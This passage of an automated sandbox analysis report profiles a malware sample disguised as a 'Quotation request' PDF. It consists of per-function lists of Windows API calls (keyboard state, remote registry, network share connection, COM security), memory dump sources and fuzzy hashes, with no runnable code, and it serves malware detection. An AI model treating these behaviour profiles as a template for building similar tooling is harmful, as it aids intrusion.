                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                    • LoadStringW.USER32(00000000), ref: 00454040
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • _wprintf.LIBCMT ref: 00454074
                                                                    • __swprintf.LIBCMT ref: 004540A3
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                    • API String ID: 455036304-4153970271
                                                                    • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                    • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                    • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                    • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                    APIs
                                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                    • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                    • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                    • _memmove.LIBCMT ref: 00467EB8
                                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                    • _memmove.LIBCMT ref: 00467F6C
                                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                    • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                    • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                    • String ID:
                                                                    • API String ID: 2170234536-0
                                                                    • Opcode ID: 41a2085762b778bd090c4eb4d83ea17da09509ac4ed3f8b2896fc2a1aa5f0729
                                                                    • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                    • Opcode Fuzzy Hash: 41a2085762b778bd090c4eb4d83ea17da09509ac4ed3f8b2896fc2a1aa5f0729
                                                                    • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                    • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                    • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                    • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                    • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                    • GetKeyState.USER32(00000012), ref: 00453E26
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                    • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                    • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                    • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                    • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                    • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                    • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                    • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                    • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                    • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                    • String ID:
                                                                    • API String ID: 3096461208-0
                                                                    • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                    • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                    • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                    • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                    • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                    • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                    • DeleteObject.GDI32(?), ref: 0047151E
                                                                    • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                    • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                    • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                    • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                    • DeleteObject.GDI32(?), ref: 004715EA
                                                                    • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                    • String ID:
                                                                    • API String ID: 3218148540-0
                                                                    • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                    • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                    • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                    • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                    • String ID:
                                                                    • API String ID: 136442275-0
                                                                    • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                    • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                    • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                    • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                    APIs
                                                                    • _wcsncpy.LIBCMT ref: 00467490
                                                                    • _wcsncpy.LIBCMT ref: 004674BC
                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                    • _wcstok.LIBCMT ref: 004674FF
                                                                      • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                    • _wcstok.LIBCMT ref: 004675B2
                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                    • _wcslen.LIBCMT ref: 00467793
                                                                    • _wcscpy.LIBCMT ref: 00467641
                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                    • _wcslen.LIBCMT ref: 004677BD
                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                      • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                    • String ID: X
                                                                    • API String ID: 3104067586-3081909835
                                                                    • Opcode ID: f80725d52a327de87f082f069484d687ce30e32218087a7638b870579c23d994
                                                                    • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                    • Opcode Fuzzy Hash: f80725d52a327de87f082f069484d687ce30e32218087a7638b870579c23d994
                                                                    • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                    • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                    • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                    • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                    • _wcslen.LIBCMT ref: 0046CDB0
                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                    • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                    • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                      • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                      • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                      • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                    Strings
                                                                    • NULL Pointer assignment, xrefs: 0046CEA6
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                    • String ID: NULL Pointer assignment
                                                                    • API String ID: 440038798-2785691316
                                                                    • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                    • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                    • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                    • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                    • _wcslen.LIBCMT ref: 004610A3
                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                    • GetWindowRect.USER32(?,?), ref: 00461248
                                                                      • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
• String ID: ThumbnailClass
• API String ID: 4136854206-1241985126
• Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
• Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
• Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
• Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
APIs
• ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
• SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
• SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
• GetClientRect.USER32(?,?), ref: 00471A1A
• RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
• DestroyIcon.USER32(?), ref: 00471AF4
Strings
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
• String ID: 2
• API String ID: 1331449709-450215437
• Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
• Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
• Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
• Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
APIs
• GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
• __swprintf.LIBCMT ref: 00460915
• __swprintf.LIBCMT ref: 0046092D
• _wprintf.LIBCMT ref: 004609E1
Strings
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
• API String ID: 3054410614-2561132961
• Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
• Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
• Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
• Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
• CLSIDFromString.OLE32(?,?), ref: 004587B3
• RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
• RegCloseKey.ADVAPI32(?), ref: 004587C5
Strings
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 600699880-22481851
• Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
• Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
• Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
• Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: DestroyWindow
• String ID: static
• API String ID: 3375834691-2160076837
• Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
• Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
• Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
• Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D959
• GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
Strings
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
• API String ID: 2907320926-3566645568
• Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
• Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
• Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
• Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
APIs
